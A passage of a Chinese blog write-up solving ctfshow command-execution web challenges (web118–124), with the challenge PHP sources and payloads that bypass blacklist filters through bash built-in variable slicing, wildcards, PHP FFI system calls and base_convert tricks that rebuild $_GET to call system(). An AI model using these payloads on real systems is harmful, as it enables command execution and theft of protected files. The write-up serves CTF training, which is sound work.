    • $ffi->system($a);: 使用 FFI 调用 system() 函数执行 $a 中的命令。
    • $a = '/readflag > /var/www/html/1.txt';: 这行定义了一个字符串 $a,包含要执行的命令。这个命令会将 readflag 程序的输出重定向到文件 /var/www/html/1.txt

    本来是想尝试 cat /flag36x.txt > /var/www/html/1.txt 的,但是发现不可以 | https://blog.csdn.net/weixin_44700621/article/details/125381763

    传入后再查看当前目录是否存在1.txt

    c=$a = new DirectoryIterator('glob://*');foreach($a as $f){echo($f->__toString().'<br>');};exit();
// 1.txt flag.php index.php 存在

  4. 读取1.txt

    c=include('1.txt');exit();

web118

进去是一个输入框

在这里插入图片描述

  1. 简单输入一些命令 ls 啥的会提示evil input ,扫描没发现什么有用的,f12 发现 system($code); 应该把字符串传输到system()函数里,题目提示了flag in flag.php

  2. fuzz检测一下过滤了啥

    过滤了小写字母和 `! % ^ & * ( + | [ ] \ ’ ” < > , / ``

  3. 一般payload都是nl flag.txt 之类的,文件名可以用 ????.??? ,前面的cat可以使用bash内置变量来构造

    参考链接:https://www.freebuf.com/articles/web/321865.html

    payload:${PATH:~${#}}${PWD:~${#}}${IFS}????.???

web119

题目给的信息和之前的差不多

  1. 首先进行fuzz

    能用字符就是大写字母和

    在这里插入图片描述

    还是够我们构造bash内置变量RCE的

  2. 输入之前的payload显示evil input

    应该是什么被过滤了,经过测试发现BASH被过滤了

    那就得使用别的内置变量来构造,其实可以构造/bin/cat flag.php 约等于 /???/?a? ????.???

    # 尝试了/???/?a? ????.???但好像使用了别的命令
${PWD::${#?}}???${PWD::${#?}}?${USER:~${#}} ????.???
# 多构造个t
${PWD::${#?}}???${PWD::${#?}}?${USER:~${#}}${USER:~${#SHLVL}:${#SHLVL}}${IFS}????.???

web120

error_reporting(0);
highlight_file(__FILE__);
if(isset($_POST['code'])){
    $code=$_POST['code'];
    if(!preg_match('/\x09|\x0a|[a-z]|[0-9]|PATH|BASH|HOME|\/|\(|\)|\[|\]|\\\\|\+|\-|\!|\=|\^|\*|\x26|\%|\<|\>|\'|\"|\`|\||\,/', $code)){    
        if(strlen($code)>65){
            echo '<div align="center">'.'you are so long , I dont like '.'</div>';
        }
        else{
        echo '<div align="center">'.system($code).'</div>';
        }
    }
    else{
     echo '<div align="center">evil input</div>';
    }
}

?>

有长度限制payload长度不能大于65,过滤PATH|BASH|HOME

  1. 看着依旧是BASH内置变量RCE,尝试了上一关的payload不过超长度限制了

    ${PWD::${#?}}???${PWD::${#?}}??${USER:~${#SHLVL}:${#?}} ????.???
// 稍微修改一下

web121

error_reporting(0);
highlight_file(__FILE__);
if(isset($_POST['code'])){
    $code=$_POST['code'];
    if(!preg_match('/\x09|\x0a|[a-z]|[0-9]|FLAG|PATH|BASH|HOME|HISTIGNORE|HISTFILESIZE|HISTFILE|HISTCMD|USER|TERM|HOSTNAME|HOSTTYPE|MACHTYPE|PPID|SHLVL|FUNCNAME|\/|\(|\)|\[|\]|\\\\|\+|\-|_|~|\!|\=|\^|\*|\x26|\%|\<|\>|\'|\"|\`|\||\,/', $code)){    
        if(strlen($code)>65){
            echo '<div align="center">'.'you are so long , I dont like '.'</div>';
        }
        else{
        echo '<div align="center">'.system($code).'</div>';
        }
    }
    else{
     echo '<div align="center">evil input</div>';
    }
}

?>

USER,SHLVL 不能使用了,可以构造 /bin/base64 flag.php

payload : ${PWD::${#?}}???${PWD::${#?}}?????${#$RANDOM} ????.???

${#$RANDOM} 为四位数的时候即可,多发送几次

web122


<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_POST['code'])){
    $code=$_POST['code'];
    if(!preg_match('/\x09|\x0a|[a-z]|[0-9]|FLAG|PATH|BASH|PWD|HISTIGNORE|HISTFILESIZE|HISTFILE|HISTCMD|USER|TERM|HOSTNAME|HOSTTYPE|MACHTYPE|PPID|SHLVL|FUNCNAME|\/|\(|\)|\[|\]|\\\\|\+|\-|_|~|\!|\=|\^|\*|\x26|#|%|\>|\'|\"|\`|\||\,/', $code)){    
        if(strlen($code)>65){
            echo '<div align="center">'.'you are so long , I dont like '.'</div>';
        }
	        else{
        echo '<div align="center">'.system($code).'</div>';
        }
    }
    else{
     echo '<div align="center">evil input</div>';
    }
}

?>

PWD是用不了了,但是HOME可以用了,不是哥们?#,~也用不了

找到了个新特性来构造1,那就是$?

$?表示上一条命令执行结束后的传回值。通常0代表执行成功,非0代表执行有误

<A返回的错误值 使得$?为1,

payload: <A;${HOME::$?}???${HOME::$?}?????${RANDOM::$?} ????.???

要多尝试几次

web124


error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

白名单函数:

abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'

base_convert  		#在任意进制之间转换数字。
hexdec 			 #把十六进制转换为十进制。
dechex 			#把十进制转换为十六进制。
hex2bin  		#把十六进制的字符串转换为ASCII码

思路:

参考:https://blog.csdn.net/Kracxi/article/details/121758970#:~:text=CTFshow 命令

// 把 hex2bin转化为10进制
echo base_convert("hex2bin", 36, 16);   //37907361743
echo "<br>";
echo base_convert("8d3746fcf", 16, 36);  //hex2bin
echo "<br>";
//把_GET 先转为16进制再转为10进制
echo hexdec(bin2hex("_GET"));  //1598506324
echo "<br>";
echo base_convert("8d3746fcf", 16, 36)(dechex("1598506324"));  // 绕过过滤拿到 "_GET"

构造代码:

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos})&abs=system&acos=ls
// 相当于 
?c=$pi='_GET';$$pi{abs}($$pi{acos})&abs=system&acos=ls
Sunset-_
关注
专栏目录
ctfshow WEB入门 命令执行29-77&118-122&124
byname1的博客
01-20 1134
可以看出这是一个二维数组。
ctfshow web入门 命令执行29-33
m0_62207170的博客
03-24 627
ctfshow web入门 命令执行29-33
ctfshow web入门 命令执行web29-web57详解
m0_75155186的博客
03-25 841
在liunx中,$(())为0 , $((~$(())))为-1 ~$代表取反,0取反后为-1,这样就可以先构造出-37,取反后就为36,也就是$(())中有37个$((~$(())))在加上取反,也就是$((~$(( ))))中有37个-1。题目没有过滤 . 可以从上传post请求来入手,构造一个post请求,会上传到服务器/tmp的临时目录下,通过上传的文本中写入Linux的shell格式,用 . 来执行这个临时文件。点了提交后会在/tmp/下生成一个临时文件,文件的名称是固定php?
CTFshow web入门 web29-------web56 命令执行wp
2202_75289892的博客
07-30 357
过滤了flag,可见是文件名过滤,需要查看flag.php 或者flag.txt等文件。此外 读取文件利用cat函数,输出利用system、passthru。3.双引号绕过 fl''ag''.php。2.反斜杠绕过 fl\ag.php。1.通配符绕过 fla?还有特殊变量$1、内联执行等。
Ctfshow web入门 命令执行RCE篇 web29-web77web118-web124 详细题解 全
Jay17的博客
08-16 3470
Ctfshow web入门 命令执行RCE篇 web29-web77web118-web124 详细题解 全
ctfshow web入门 web118--web122 && web124
2301_81040377的博客
04-07 354
数字4还是用RANDOM随机数来获取,不过是换种方式,1/10的概率,多发几次包。获取上一条命令执行结束后的返回值就是1。我们就成功构造出了数字1。这里利用一个环境变量切片得到所能使用的字母执行命令。等命令会因找不到目录或者文件执行失败,返回值是1,但是空格没被过滤我把${IFS}换成空格就刚好了。用hackbar给我卡着了那就抓包呗。我本来想套娃,但是长度被限制了。借用大佬的好东西我还没懂。
CTFShow Web入门 命令执行(持续更新)
tj13995958709的博客
04-22 2039
3.array_pop(next(get_defined_vars()))是将数组中最后一个键值对的值弹出,配和POST传入的1=phpinfo();过滤了数字、大小写字母和一些特殊符号,基本大部分的都过滤了,只能对ASCII码中没被过滤的字符进行匹配,需要用到python写一个自动化脚本,以下是摘自往上的python脚本代码。除了system()、反引号``可以执行系统命令,exec()、shell_exec()、passthru()等函数也可以。这题又多过滤的几个特殊符号,通配符*被过滤了,可以用?
ctfshow web入门命令执行web74-118
m0_62207170的博客
04-12 344
ctfshow web入门命令执行web74-118
ctfshow web入门 命令执行web75-77
weixin_44700621的博客
06-20 1604
ctfshow web入门 命令执行 web75和web77题简单分析
CTFSHOW WEB入门 命令执行 web29-web36
m0_53194713的博客
06-26 1324
ctfshow web29 web30 web31
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 903
ctfshow,命令执行web31
ctfshow-web入门-命令执行-web30
HkD01L的博客
06-21 281
ctfshow,命令执行,web30
[ctfshow]web入门——命令执行web118-web122+web124
ShenZ的博客
02-28 3775
[ctfshow]web入门——命令执行 文章目录[ctfshow]web入门——命令执行web118web119web120web121web122web124 web118 源码里有提示 非法输入会有evil input fuzz一下发现可以用大写字母A-Z和${}~.?: # echo ${PWD} /root # echo ${PWD:0:1} #表示从0下标开始的第一个字符 / # echo ${PWD:~0:1} #从结尾开始往前的第一个字符
【网络安全】利用域名混淆绕过 CSRF 实现账户接管
等风来
09-08 359
传统的 CSRF 攻击依赖于表单提交,其中包含 application/x-www-form-urlencoded 或 multipart/form-data 类型的数据。这些表单数据可以直接由浏览器发送,而攻击者可以伪造表单提交。然而,application/json 类型的数据必须通过 JavaScript 的 fetch 或 XMLHttpRequest 发送,这要求攻击者的页面能够执行这段 JavaScript,并且满足 CORS(跨源资源共享)策略。
2024网络安全人才实战能力白皮书安全测试评估篇
最新发布
2301_76786857的博客
09-13 515
据了解,白皮书通过大量一线网络安全从业人员、网络安全相关专业在校学生问卷调研数据及网络安全人才测评演练数据分析,呈现供给侧、需求侧安全测试评估人才的基本情况、培养情况和岗位实践,并以理论与实践相结合的方式创新提出了一套立体化综合评价安全测评人才能力的——GPE方法,为数字中国建设中的安全测试评估人才培养和评价提供可行方案。当前,在政治、经济、文化和社会安全等多个领域相互交织影响的背景下,网络安全测评是政府保障国家安全和社会稳定的重要手段之一,社会急需网络安全测评人才,防范化解风险提供安全保障。
网络安全 day5 --- 反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
2302_81156108的博客
09-07 1869
学习网络安全的一些心得希望对大家起到一些帮助
网络安全(黑客)——自学2024
2401_84466325的博客
09-13 920
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过技巧,如分号、竖线、双与号等。这些技巧可以用来绕过应用程序对输入参数的限制,从而注入恶意的命令。 引用中提到的payload,其中使用了一个通用的命令执行函数"show_source"来显示指定文件的源代码。这个payload可以用来尝试执行"flag.php"文件的源代码。但前提是要知道有一个名为"flag.php"的文件存在。 另外,引用中提供了另一种payload的示例,其中使用了array_reverse和scandir函数来获取文件目录并显示指定文件的源代码。同样,也可以直接使用show_source('flag.php')来显示"flag.php"文件的源代码。 需要注意的是,命令执行漏洞是非常危险的,因为它可以导致恶意用户执行任意的系统命令。为了保护Web应用程序免受此类攻击,开发人员应该对用户的输入进行严格的验证和过滤,并使用安全的编程实践来防止命令注入漏洞的发生。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ctfshow web入门命令执行](https://blog.csdn.net/uuzfumo/article/details/128357863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTFShow Web入门 命令执行](https://blog.csdn.net/qq_19533763/article/details/123910732)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值